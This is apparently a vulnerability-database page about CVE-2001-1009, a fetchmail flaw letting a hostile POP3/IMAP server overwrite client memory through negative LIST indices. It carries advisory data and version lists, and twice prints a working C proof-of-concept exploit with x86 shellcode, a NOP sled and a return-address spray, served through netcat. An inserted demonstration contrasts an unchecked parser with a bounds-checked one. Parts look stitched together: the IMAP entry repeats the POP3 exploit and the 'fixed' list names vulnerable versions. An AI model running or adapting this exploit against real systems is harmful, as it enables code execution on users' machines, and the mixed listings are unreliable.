CVE-2001-1009
CVSS 10.0
Published: 2001-08-31 00:00:00
Revised: 2011-02-16 00:00:00

[Original] Fetchmail (aka fetchmail-ssl) before 5.8.17 allows a remote malicious (1) IMAP server or (2) POP/POP3 server to overwrite arbitrary memory and possibly gain privileges via a negative index number as part of a response to a LIST request.


[CNNVD] Fetchmail POP3 Reply Signed Integer Index Vulnerability (CNNVD-200108-156)

        Fetchmail (also known as fetchmail-ssl) before version 5.8.17 is vulnerable. A remote malicious (1) IMAP server or (2) POP/POP3 server can overwrite arbitrary memory, and possibly gain privileges, by supplying a negative index number as part of its response to a LIST request.

- CVSS (base score)

CVSS score: 10 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause complete system shutdown]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CWE (weakness category)

CWE-264 [Permissions, Privileges, and Access Controls]

- CPE (affected platforms and products)

cpe:/a:fetchmail:fetchmail:5.2.1  Fetchmail 5.2.1
cpe:/a:fetchmail:fetchmail:4.6.1  Fetchmail 4.6.1
cpe:/a:fetchmail:fetchmail:5.5.3  Fetchmail 5.5.3
cpe:/a:fetchmail:fetchmail:4.7.7  Fetchmail 4.7.7
cpe:/a:fetchmail:fetchmail:4.7.6  Fetchmail 4.7.6
cpe:/a:fetchmail:fetchmail:5.4.5  Fetchmail 5.4.5
cpe:/a:fetchmail:fetchmail:5.0.0  Fetchmail 5.0.0
cpe:/a:fetchmail:fetchmail:4.6.8  Fetchmail 4.6.8
cpe:/a:fetchmail:fetchmail:5.5.0  Fetchmail 5.5.0
cpe:/a:fetchmail:fetchmail:5.8.4  Fetchmail 5.8.4
cpe:/a:fetchmail:fetchmail:4.5.3  Fetchmail 4.5.3
cpe:/a:fetchmail:fetchmail:5.0.6  Fetchmail 5.0.6
cpe:/a:fetchmail:fetchmail:5.1.0  Fetchmail 5.1.0
cpe:/a:fetchmail:fetchmail:4.7.2  Fetchmail 4.7.2
cpe:/a:fetchmail:fetchmail:4.6.0  Fetchmail 4.6.0
cpe:/a:fetchmail:fetchmail:5.8.13  Fetchmail 5.8.13
cpe:/a:fetchmail:fetchmail:4.5.2  Fetchmail 4.5.2
cpe:/a:fetchmail:fetchmail:4.7.5  Fetchmail 4.7.5
cpe:/a:fetchmail:fetchmail:4.6.9  Fetchmail 4.6.9
cpe:/a:fetchmail:fetchmail:5.0.3  Fetchmail 5.0.3
cpe:/a:fetchmail:fetchmail:5.9.0  Fetchmail 5.9.0
cpe:/a:fetchmail:fetchmail:4.7.4  Fetchmail 4.7.4
cpe:/a:fetchmail:fetchmail:5.6.0  Fetchmail 5.6.0
cpe:/a:fetchmail:fetchmail:5.0.7  Fetchmail 5.0.7
cpe:/a:fetchmail:fetchmail:4.5.1  Fetchmail 4.5.1
cpe:/a:fetchmail:fetchmail:5.8.11  Fetchmail 5.8.11
cpe:/a:fetchmail:fetchmail:5.2.0  Fetchmail 5.2.0
cpe:/a:fetchmail:fetchmail:4.5.5  Fetchmail 4.5.5
cpe:/a:fetchmail:fetchmail:4.6.2  Fetchmail 4.6.2
cpe:/a:fetchmail:fetchmail:5.8.14  Fetchmail 5.8.14
cpe:/a:fetchmail:fetchmail:5.3.0  Fetchmail 5.3.0
cpe:/a:fetchmail:fetchmail:4.5.4  Fetchmail 4.5.4
cpe:/a:fetchmail:fetchmail:5.8.5  Fetchmail 5.8.5
cpe:/a:fetchmail:fetchmail:4.5.7  Fetchmail 4.5.7
cpe:/a:fetchmail:fetchmail:4.6.4  Fetchmail 4.6.4
cpe:/a:fetchmail:fetchmail:5.2.3  Fetchmail 5.2.3
cpe:/a:fetchmail:fetchmail:4.5.8  Fetchmail 4.5.8
cpe:/a:fetchmail:fetchmail:5.0.5  Fetchmail 5.0.5
cpe:/a:fetchmail:fetchmail:4.5.6  Fetchmail 4.5.6
cpe:/a:fetchmail:fetchmail:5.0.2  Fetchmail 5.0.2
cpe:/a:fetchmail:fetchmail:5.5.5  Fetchmail 5.5.5
cpe:/a:fetchmail:fetchmail:5.1.4  Fetchmail 5.1.4
cpe:/a:fetchmail:fetchmail:5.5.6  Fetchmail 5.5.6
cpe:/a:fetchmail:fetchmail:5.0.1  Fetchmail 5.0.1
cpe:/a:fetchmail:fetchmail:4.7.3  Fetchmail 4.7.3
cpe:/a:fetchmail:fetchmail:5.7.0  Fetchmail 5.7.0
cpe:/a:fetchmail:fetchmail:5.2.8  Fetchmail 5.2.8
cpe:/a:fetchmail:fetchmail:5.3.1  Fetchmail 5.3.1
cpe:/a:fetchmail:fetchmail:5.3.8  Fetchmail 5.3.8
cpe:/a:fetchmail:fetchmail:5.4.3  Fetchmail 5.4.3
cpe:/a:fetchmail:fetchmail:4.6.3  Fetchmail 4.6.3
cpe:/a:fetchmail:fetchmail:5.8.2  Fetchmail 5.8.2
cpe:/a:fetchmail:fetchmail:5.7.4  Fetchmail 5.7.4
cpe:/a:fetchmail:fetchmail:5.2.4  Fetchmail 5.2.4
cpe:/a:fetchmail:fetchmail:5.8  Fetchmail 5.8
cpe:/a:fetchmail:fetchmail:4.7.1  Fetchmail 4.7.1
cpe:/a:fetchmail:fetchmail:4.6.6  Fetchmail 4.6.6
cpe:/a:fetchmail:fetchmail:4.6.5  Fetchmail 4.6.5
cpe:/a:fetchmail:fetchmail:5.5.2  Fetchmail 5.5.2
cpe:/a:fetchmail:fetchmail:4.6.7  Fetchmail 4.6.7
cpe:/a:fetchmail:fetchmail:5.4.4  Fetchmail 5.4.4
cpe:/a:fetchmail:fetchmail:5.0.8  Fetchmail 5.0.8
cpe:/a:fetchmail:fetchmail:5.3.3  Fetchmail 5.3.3
cpe:/a:fetchmail:fetchmail:4.7.0  Fetchmail 4.7.0
cpe:/a:fetchmail:fetchmail:5.0.4  Fetchmail 5.0.4
cpe:/a:fetchmail:fetchmail:5.8.3  Fetchmail 5.8.3
cpe:/a:fetchmail:fetchmail:5.7.2  Fetchmail 5.7.2
cpe:/a:fetchmail:fetchmail:5.2.7  Fetchmail 5.2.7
cpe:/a:fetchmail:fetchmail:5.8.6  Fetchmail 5.8.6
cpe:/a:fetchmail:fetchmail:5.8.1  Fetchmail 5.8.1
cpe:/a:fetchmail:fetchmail:5.4.0  Fetchmail 5.4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1009
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-156
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/3166
(VENDOR_ADVISORY)  BID  3166
http://www.securityfocus.com/bid/3164
(VENDOR_ADVISORY)  BID  3164
http://www.redhat.com/support/errata/RHSA-2001-103.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:103
http://www.linuxsecurity.com/advisories/other_advisory-1555.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20010816-01
http://archives.neohapsis.com/archives/bugtraq/2001-08/0118.html
(VENDOR_ADVISORY)  BUGTRAQ  20010809 Fetchmail security advisory
http://www.novell.com/linux/security/advisories/2001_026_fetchmail_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:026
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-072.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:072
http://www.iss.net/security_center/static/6965.php
(UNKNOWN)  XF  fetchmail-signed-integer-index(6965)
http://www.debian.org/security/2001/dsa-071
(UNKNOWN)  DEBIAN  DSA-071
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000419
(UNKNOWN)  CONECTIVA  CLA-2001:419

- Vulnerability information

Fetchmail POP3 Reply Signed Integer Index Vulnerability
Critical  Input validation
2001-08-31 00:00:00  2005-10-20 00:00:00
Remote
        Fetchmail (also known as fetchmail-ssl) before version 5.8.17 is vulnerable. A remote malicious (1) IMAP server or (2) POP/POP3 server can overwrite arbitrary memory, and possibly gain privileges, by supplying a negative index number as part of its response to a LIST request.

- Advisories and patches

        A fixed version has been made available.
        Various vendors have also released fixed packages:
        Eric Raymond Fetchmail 5.3.8
        Eric Raymond Fetchmail 5.4.0
        Eric Raymond Fetchmail 5.5.2
        Eric Raymond Fetchmail 5.7.4
        Eric Raymond Fetchmail 5.8.0
        Eric Raymond Fetchmail 5.8.1
        Eric Raymond Fetchmail 5.8.10
        Eric Raymond Fetchmail 5.8.11
        Eric Raymond Fetchmail 5.8.12
        Eric Raymond Fetchmail 5.8.13
        Eric Raymond Fetchmail 5.8.14
        Eric Raymond Fetchmail 5.8.15
        Eric Raymond Fetchmail 5.8.16
        Eric Raymond Fetchmail 5.8.2
        Eric Raymond Fetchmail 5.8.3
        Eric Raymond Fetchmail 5.8.4
        Eric Raymond Fetchmail 5.8.5
        Eric Raymond Fetchmail 5.8.6

- Vulnerability information (21064)

Fetchmail 5.x POP3 Reply Signed Integer Index Vulnerability (EDBID:21064)
unix remote
2001-08-09 Verified
0 Salvatore Sanfilippo -antirez-
N/A
source: http://www.securityfocus.com/bid/3164/info

Fetchmail is a Unix utility for downloading email from mail servers via POP3.

Fetchmail contains a vulnerability that may allow remote attackers to gain access to client systems. The flaw is the use of a remotely supplied signed integer value as the index into an array when writing data to memory: the message number in each "num size" line of the server's LIST response is used as the array index without a range check, so a negative message number makes the client write the attacker-chosen size below the start of the array.

It may be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's POP3 server can be impersonated. Successful exploitation can lead to the execution of arbitrary code on the client host, in the context of the user running fetchmail.

/* fetchmail proof-of-concept i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offsets carefully selected
 * to work on my own system. It will probably not work on
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain proof that your fetchmail is vulnerable
 * without exploiting it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit's portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20          /* not referenced below: ret_offset in main() is the value actually used */
#define SHELL_PTR 0xbfffba94     /* guessed stack address of the NOP sled / shellcode inside the client */

int main(void)
{
	int ish = (int)SHELL_PTR;
	int ret_offset = -10;        /* LIST message number whose array slot overlaps the saved return address */
	char shellcode[] = /* keep the shellcode a multiple of 4 in size: it is sent one int per LIST line */
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
	int *sc = (int*) shellcode;
	int noop = 0x90909090;
	int i;

	/* +OK for the greeting, USER and PASS, then STAT reporting MESSAGES messages,
	 * then the +OK lines answering LAST and opening the multi-line LIST reply */
	printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
	/* Overwrite the RET pointer: each "num size" line makes fetchmail store size
	 * at index num-1 with no range check, so negative nums write below the array.
	 * Spray the guessed address over a window of slots around ret_offset. */
	for (i = ret_offset-20; i < ret_offset+20; i++)
		printf("%d %d\r\n", i, ish);
	/* Put some NOPs at positive indices 1..20: a sled inside the array itself */
	for (i = 1; i < 21; i++)
		printf("%d %d\r\n", i, noop);
	/* Put the shellcode in the buffer right after the sled, 4 bytes per LIST line */
	for (i = 21; i < 21+(int)(sizeof(shellcode)/4); i++)
		printf("%d %d\r\n", i, *sc++);
	printf(".\r\n"); /* POP3 multi-line response terminator */
	return 0;
}
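The index bug the description above names, as an added example that is not part of this page or of fetchmail's source: a simulated client memory image in which the msgsizes array sits above a slot standing in for the saved return address, an unchecked LIST parser modelled on the reported pattern, and a hardened parser that enforces the 1..count range before the message number touches the array. The frame layout, slot positions, function names and the LIST lines are all constructed for this demonstration and are not fetchmail's; the hostile value is 0xbfffba94 read as a signed int, the SHELL_PTR the published exploit sprays.

```c
#include <stdio.h>
#include <string.h>

/* Constructed client memory image. The backing buffer stands in for the
 * stack: the msgsizes array a client fills from LIST lines begins at
 * frame[SIZES_AT], and a slot well below it plays the saved return
 * address. Indexing msgsizes with a negative number stays inside the
 * backing array, so the overwrite is well-defined C and can be inspected. */
#define FRAME_WORDS 64
#define SIZES_AT    32      /* msgsizes == &frame[SIZES_AT]                 */
#define SAVED_RET   16      /* slot standing in for a saved return address  */
#define MSG_COUNT   10      /* message count the fake server reported in STAT */

typedef struct { int frame[FRAME_WORDS]; } client_mem;

/* Vulnerable pattern (modelled on the bug report, not fetchmail's code):
 * the message number from a "num size" line is used as an index as-is. */
int list_store_unchecked(client_mem *m, const char *line)
{
    int num, size;
    if (sscanf(line, "%d %d", &num, &size) != 2)
        return -1;                          /* not a LIST line */
    int *msgsizes = &m->frame[SIZES_AT];
    msgsizes[num - 1] = size;               /* num == -15 lands on frame[16] */
    return 0;
}

/* Hardened form: the index must name a message the server announced, the
 * array bound is enforced independently of what the server claimed, and a
 * size can never be negative. Returns 0 on success, negative on rejection. */
int list_store_checked(client_mem *m, const char *line, int count)
{
    int num, size;
    if (sscanf(line, "%d %d", &num, &size) != 2)
        return -1;
    if (num < 1 || num > count || num > FRAME_WORDS - SIZES_AT)
        return -2;                          /* out-of-range message number */
    if (size < 0)
        return -3;
    int *msgsizes = &m->frame[SIZES_AT];
    msgsizes[num - 1] = size;
    return 0;
}

/* Constructed LIST reply: one honest line, then lines a hostile server
 * would send. -15 targets the saved-return slot (index -16 below msgsizes),
 * 0 hits the word just below the array, 11 is one past the STAT count. */
static const char *const LIST_LINES[] = {
    "1 1234",
    "-15 -1073743212",
    "0 99",
    "11 500",
};
#define N_LINES (int)(sizeof LIST_LINES / sizeof LIST_LINES[0])

/* Feed the reply to the unchecked parser; return what is now in the
 * saved-return slot (0 if it was untouched). */
int saved_ret_after_unchecked(void)
{
    client_mem m;
    memset(&m, 0, sizeof m);
    for (int i = 0; i < N_LINES; i++)
        list_store_unchecked(&m, LIST_LINES[i]);
    return m.frame[SAVED_RET];
}

/* Same reply through the checked parser; returns the saved-return slot and,
 * via *rejected, how many lines were refused. */
int saved_ret_after_checked(int *rejected)
{
    client_mem m;
    memset(&m, 0, sizeof m);
    int n = 0;
    for (int i = 0; i < N_LINES; i++)
        if (list_store_checked(&m, LIST_LINES[i], MSG_COUNT) != 0)
            n++;
    if (rejected)
        *rejected = n;
    return m.frame[SAVED_RET];
}

int main(void)
{
    int rejected = 0;
    printf("unchecked: saved-return slot = 0x%08x\n",
           (unsigned)saved_ret_after_unchecked());
    printf("checked:   saved-return slot = 0x%08x, %d hostile lines rejected\n",
           (unsigned)saved_ret_after_checked(&rejected), rejected);
    return 0;
}
```

The checked parser bounds the index against the real array size as well as against the STAT count, because the count itself came from the same untrusted server; a server that lies in STAT must not be able to widen the window it is later allowed to write into.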
		

- Vulnerability information (21066)

Fetchmail 5.x IMAP Reply Signed Integer Index Vulnerability (EDBID:21066)
unix remote
2001-08-09 Verified
0 Sanfilippo antirez
N/A
source: http://www.securityfocus.com/bid/3166/info

Fetchmail is a Unix utility for downloading email from mail servers via POP3 and IMAP.

Fetchmail contains a vulnerability that may allow remote attackers to gain access to client systems. The flaw is the use of a remotely supplied signed integer value as the index into an array when writing data to memory: the message number in each line of the server's LIST response is used as the array index without a range check, so a negative message number makes the client write the attacker-chosen size below the start of the array.

It may be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's IMAP server can be impersonated. Successful exploitation can lead to the execution of arbitrary code on the client host, in the context of the user running fetchmail.

/* fetchmail proof-of-concept i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offsets carefully selected
 * to work on my own system. It will probably not work on
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain proof that your fetchmail is vulnerable
 * without exploiting it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit's portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20          /* not referenced below: ret_offset in main() is the value actually used */
#define SHELL_PTR 0xbfffba94     /* guessed stack address of the NOP sled / shellcode inside the client */

int main(void)
{
	int ish = (int)SHELL_PTR;
	int ret_offset = -10;        /* LIST message number whose array slot overlaps the saved return address */
	char shellcode[] = /* keep the shellcode a multiple of 4 in size: it is sent one int per LIST line */
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
	int *sc = (int*) shellcode;
	int noop = 0x90909090;
	int i;

	/* +OK for the greeting, USER and PASS, then STAT reporting MESSAGES messages,
	 * then the +OK lines answering LAST and opening the multi-line LIST reply */
	printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
	/* Overwrite the RET pointer: each "num size" line makes fetchmail store size
	 * at index num-1 with no range check, so negative nums write below the array.
	 * Spray the guessed address over a window of slots around ret_offset. */
	for (i = ret_offset-20; i < ret_offset+20; i++)
		printf("%d %d\r\n", i, ish);
	/* Put some NOPs at positive indices 1..20: a sled inside the array itself */
	for (i = 1; i < 21; i++)
		printf("%d %d\r\n", i, noop);
	/* Put the shellcode in the buffer right after the sled, 4 bytes per LIST line */
	for (i = 21; i < 21+(int)(sizeof(shellcode)/4); i++)
		printf("%d %d\r\n", i, *sc++);
	printf(".\r\n"); /* POP3 multi-line response terminator */
	return 0;
}

- Vulnerability information

10329
Fetchmail IMAP Server Negative Index Privilege Escalation
Remote / Network Access  Input Manipulation
Loss of Integrity  Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2001-08-10 Unknown
2001-08-10 Unknown

- Solution

Upgrade to version 5.8.17 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Fetchmail IMAP Reply Signed Integer Index Vulnerability
Input Validation Error  3166
Remote: Yes  Local: No
2001-08-09 12:00:00  2009-07-11 07:56:00
Discovered by Salvatore Sanfilippo (antirez) <antirez@invece.org>.

- Affected program versions

Eric Raymond Fetchmail 5.8.16
Eric Raymond Fetchmail 5.8.15
Eric Raymond Fetchmail 5.8.14
Eric Raymond Fetchmail 5.8.13
Eric Raymond Fetchmail 5.8.12
Eric Raymond Fetchmail 5.8.11
Eric Raymond Fetchmail 5.8.10
Eric Raymond Fetchmail 5.8.9
Eric Raymond Fetchmail 5.8.8
Eric Raymond Fetchmail 5.8.7
Eric Raymond Fetchmail 5.8.6
- Apple Mac OS X 10.1
Eric Raymond Fetchmail 5.8.5
Eric Raymond Fetchmail 5.8.4
Eric Raymond Fetchmail 5.8.3
Eric Raymond Fetchmail 5.8.2
Eric Raymond Fetchmail 5.8.1
Eric Raymond Fetchmail 5.8.0
+ S.u.S.E. Linux 7.2
Eric Raymond Fetchmail 5.7.4
- Mandriva Linux Mandrake 8.0
Eric Raymond Fetchmail 5.7.3
Eric Raymond Fetchmail 5.7.2
Eric Raymond Fetchmail 5.7.1
- Debian Linux 2.3
Eric Raymond Fetchmail 5.7
Eric Raymond Fetchmail 5.6.8
Eric Raymond Fetchmail 5.6.7
Eric Raymond Fetchmail 5.6.6
Eric Raymond Fetchmail 5.6.5
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Eric Raymond Fetchmail 5.6.4
Eric Raymond Fetchmail 5.6.3
Eric Raymond Fetchmail 5.6.2
Eric Raymond Fetchmail 5.6.1
Eric Raymond Fetchmail 5.6
Eric Raymond Fetchmail 5.5.6
Eric Raymond Fetchmail 5.5.5
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
Eric Raymond Fetchmail 5.5.4
Eric Raymond Fetchmail 5.5.3
Eric Raymond Fetchmail 5.5.2
Eric Raymond Fetchmail 5.5.1
Eric Raymond Fetchmail 5.5
+ Cobalt Qube 3.0
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
Eric Raymond Fetchmail 5.4.5
Eric Raymond Fetchmail 5.4.4
Eric Raymond Fetchmail 5.4.3
Eric Raymond Fetchmail 5.4.2
Eric Raymond Fetchmail 5.4.1
Eric Raymond Fetchmail 5.4.0
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ EnGarde Secure Linux 1.0.1
- Guardian Digital Engarde Secure Linux 1.0.1

- Unaffected program versions

Eric Raymond Fetchmail 5.8.17
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1

- Vulnerability discussion

Fetchmail is a Unix utility for downloading email from mail servers via POP3 and IMAP.

Fetchmail contains a vulnerability that may allow remote attackers to gain access to client systems. The flaw is the use of a remotely supplied signed integer value as the index into an array when writing data to memory.

It may be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's IMAP server can be impersonated. Successful exploitation can lead to the execution of arbitrary code on the client host.

- Exploit

Salvatore Sanfilippo (antirez) <antirez@invece.org> published proof-of-concept code.

- Solution

A fixed version has been made available.

Various vendors have also released fixed packages:

Eric Raymond Fetchmail 5.4.0
Eric Raymond Fetchmail 5.5.2
Eric Raymond Fetchmail 5.7.4
Eric Raymond Fetchmail 5.8.0
Eric Raymond Fetchmail 5.8.1
Eric Raymond Fetchmail 5.8.10
Eric Raymond Fetchmail 5.8.11
Eric Raymond Fetchmail 5.8.12
Eric Raymond Fetchmail 5.8.13
Eric Raymond Fetchmail 5.8.14
Eric Raymond Fetchmail 5.8.15
Eric Raymond Fetchmail 5.8.16
Eric Raymond Fetchmail 5.8.2
Eric Raymond Fetchmail 5.8.3
Eric Raymond Fetchmail 5.8.4
Eric Raymond Fetchmail 5.8.5
Eric Raymond Fetchmail 5.8.6
Eric Raymond Fetchmail 5.8.7
Eric Raymond Fetchmail 5.8.8
Eric Raymond Fetchmail 5.8.9

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.